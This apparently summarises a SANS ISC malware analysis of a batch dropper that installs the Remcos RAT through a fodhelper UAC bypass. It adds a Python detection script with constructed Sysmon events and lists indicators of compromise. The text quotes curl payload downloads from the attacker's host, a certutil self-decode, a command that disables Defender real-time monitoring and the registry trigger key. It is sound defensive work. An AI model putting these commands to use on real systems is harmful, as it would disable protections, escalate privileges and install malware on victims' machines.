I found a simple batch file (2.bat) that drops a Remcos RAT using an old fodhelper UAC bypass to gain high privileges. The dropper decodes embedded Base64 with certutil, then downloads and launches the malware chain, including a PowerShell-based stage that attempts to disable AMSI/Defender and persists via registry changes. #Remcos #Papero
Keypoints
- Remcos RAT is delivered via a two-stage batch/dropper chain that leverages fodhelper to bypass User Account Control (UAC) and achieve high privileges.
- The initial BAT decodes embedded Base64 using certutil to produce the next dropped BAT file and execute it.
- The first-stage dropper downloads additional payloads (e.g., adhd.bat, net.vbs, and a PowerShell script) via curl and writes the HKCU ms-settings registry key that fodhelper.exe reads, which both triggers the UAC bypass and persists in the registry until removed.
- The PowerShell component (puedo.ps1) downloads and executes the final payload, attempts to bypass AMSI/Defender, and configures a C2 and operational settings.
- The final payload is a Remcos RAT with a configured C2 (e.g., 171.22.30.7:5578) and a Papero botnet association; the sample’s SHA256 is 6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3.
- AMSI/Defender evasion and registry-based persistence are used to maintain stealth and long-term access.
- The article links Remcos to Malpedia and provides multiple artifact names and download URLs used in the chain.
MITRE Techniques
- [T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control – fodhelper.exe is an auto-elevating binary that will "search for specific registry keys and, if present, will execute their content with high privileges."
- [T1105] Ingress Tool Transfer – The dropper downloads payloads via curl, e.g., "curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url …"
- [T1059.001] PowerShell – The PowerShell stage downloads and executes payloads and tampers with Defender settings, e.g., "powershell -NonInteractive -Command Add-MpPreference …".
- [T1140] Deobfuscate/Decode Files or Information – certutil decodes the Base64 blob embedded in the running script to create the next-stage BAT, e.g., "CERTUTIL -f -decode "%~f0" …" (%~f0 expands to the full path of the batch file itself).
- [T1112] Modify Registry – The fodhelper trigger key is written under "HKCU:\Software\Classes\ms-settings\shell\open\command", with an empty DelegateExecute value so that the key's (Default) command runs at high integrity when fodhelper.exe launches.
- [T1562.001] Impair Defenses – Attempts to disable AMSI and Microsoft Defender, e.g., “Set-MpPreference -DisableRealtimeMonitoring”
- [T1059.003] Windows Command Shell – Use of batch scripts and command-line actions to stage and run components.
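The technique list above maps directly onto host telemetry, so the following added example (written for this page, not code from the ISC diary) turns it into a small rule set run over Sysmon-style events: process creations (EventID 1) for certutil -decode, curl downloads, a shell spawned by fodhelper.exe and Set-/Add-MpPreference tampering, plus registry value writes (EventID 13) to the ms-settings\shell\open\command key. The events are constructed for the demo and are not captured logs; they reuse the file names and the 171.22.30.120 download host from the article, while the user profile path and SID are made up. Field names follow Sysmon's schema (Image, ParentImage, CommandLine, TargetObject); note that Sysmon logs HKCU as HKU\<SID>, so the key is matched on its tail rather than on the "HKCU:" prefix.

```python
"""Rule-based triage of Sysmon-style events for the fodhelper/Remcos batch chain.
Added example for this page; the events below are constructed, not real logs."""
import re
from typing import Callable, Dict, List, Set, Tuple

Event = Dict[str, object]

# Sysmon records HKCU keys as HKU\<SID>\..., so match on the tail of the path.
FODHELPER_KEY = re.compile(r"\\software\\classes\\ms-settings\\shell\\open\\command", re.I)
MPPREF_TAMPER = re.compile(r"(Set-MpPreference\s+-Disable|Add-MpPreference\s+-Exclusion)", re.I)


def _image_is(event: Event, name: str, field: str = "Image") -> bool:
    """True when the Image/ParentImage path ends with \\<name> (case-insensitive)."""
    return str(event.get(field, "")).lower().endswith("\\" + name)


def _cmd(event: Event) -> str:
    return str(event.get("CommandLine", ""))


# (technique id, description, predicate); EventID 1 = process create, 13 = registry value set.
RULES: List[Tuple[str, str, Callable[[Event], bool]]] = [
    ("T1140", "certutil -decode used to unpack an embedded stage",
     lambda e: e["EventID"] == 1 and _image_is(e, "certutil.exe")
     and re.search(r"-decode\b", _cmd(e), re.I) is not None),
    ("T1105", "curl fetching a remote payload",
     lambda e: e["EventID"] == 1 and _image_is(e, "curl.exe")
     and re.search(r"https?://", _cmd(e), re.I) is not None),
    ("T1112", "ms-settings\\shell\\open\\command written (fodhelper trigger key)",
     lambda e: e["EventID"] == 13
     and FODHELPER_KEY.search(str(e.get("TargetObject", ""))) is not None),
    ("T1548.002", "fodhelper.exe spawned a shell (UAC bypass fired)",
     lambda e: e["EventID"] == 1 and _image_is(e, "fodhelper.exe", "ParentImage")
     and (_image_is(e, "cmd.exe") or _image_is(e, "powershell.exe"))),
    ("T1562.001", "Defender weakened through Set-/Add-MpPreference",
     lambda e: e["EventID"] == 1 and MPPREF_TAMPER.search(_cmd(e)) is not None),
]


def evaluate(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Return one (event index, technique id, description) tuple per rule hit."""
    hits = []
    for idx, event in enumerate(events):
        for tech, desc, pred in RULES:
            if pred(event):
                hits.append((idx, tech, desc))
    return hits


def techniques_seen(events: List[Event]) -> Set[str]:
    return {tech for _, tech, _ in evaluate(events)}


def looks_like_fodhelper_chain(events: List[Event]) -> bool:
    """Escalate only when the trigger-key write AND a fodhelper child shell both
    appear; either one alone is a weaker signal (admins and installers do touch
    ms-settings occasionally, and fodhelper.exe runs legitimately)."""
    return {"T1112", "T1548.002"} <= techniques_seen(events)


# Constructed sample telemetry (user path and SID are made up).
MALICIOUS_CHAIN: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'CERTUTIL -f -decode "C:\Users\victim\Downloads\2.bat" "C:\Users\victim\Links\adhd.bat"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -s --output C:\Users\victim\Links\adhd.bat --url http://171.22.30.120/adhd.bat"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\shell\open\command\DelegateExecute",
     "Details": "(Empty)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\shell\open\command\(Default)",
     "Details": r"cmd.exe /c C:\Users\victim\Links\adhd.bat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe", "IntegrityLevel": "High",
     "CommandLine": r"cmd.exe /c C:\Users\victim\Links\adhd.bat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true"},
]

BENIGN_NOISE: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -hashfile C:\Users\victim\Downloads\setup.exe SHA256"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\.txt\(Default)", "Details": "txtfile"},
]

if __name__ == "__main__":
    stream = MALICIOUS_CHAIN + BENIGN_NOISE
    for idx, tech, desc in evaluate(stream):
        print(f"event {idx}: {tech} {desc}")
    print("fodhelper chain:", looks_like_fodhelper_chain(stream))
```

The per-technique rules are deliberately loose (any certutil -decode, any curl to a URL) because each is only a building block; the escalation decision in looks_like_fodhelper_chain requires the registry trigger write and the fodhelper child shell together, which is the pairing this dropper cannot avoid producing.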
Indicators of Compromise
- [SHA256] 6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3 – Remcos RAT sample hash referenced in the article.
- [IP] 171.22.30.7:5578 – Remcos C2 server address used by the malware configuration.
- [IP] 171.22.30.120 – Host serving the downloaded components (e.g., puedo.ps1, adhd.bat).
- [URL] http://171.22.30.120/puedo.ps1 – PowerShell stage downloaded by the chain.
- [File name] 2.bat – Initial dropper; [File name] adhd.bat – Downloaded second-stage batch file; the article also lists two further hashes and file names (e.g., adhd - Copia.bat, net.vbs).
Read more: https://isc.sans.edu/diary/rss/29078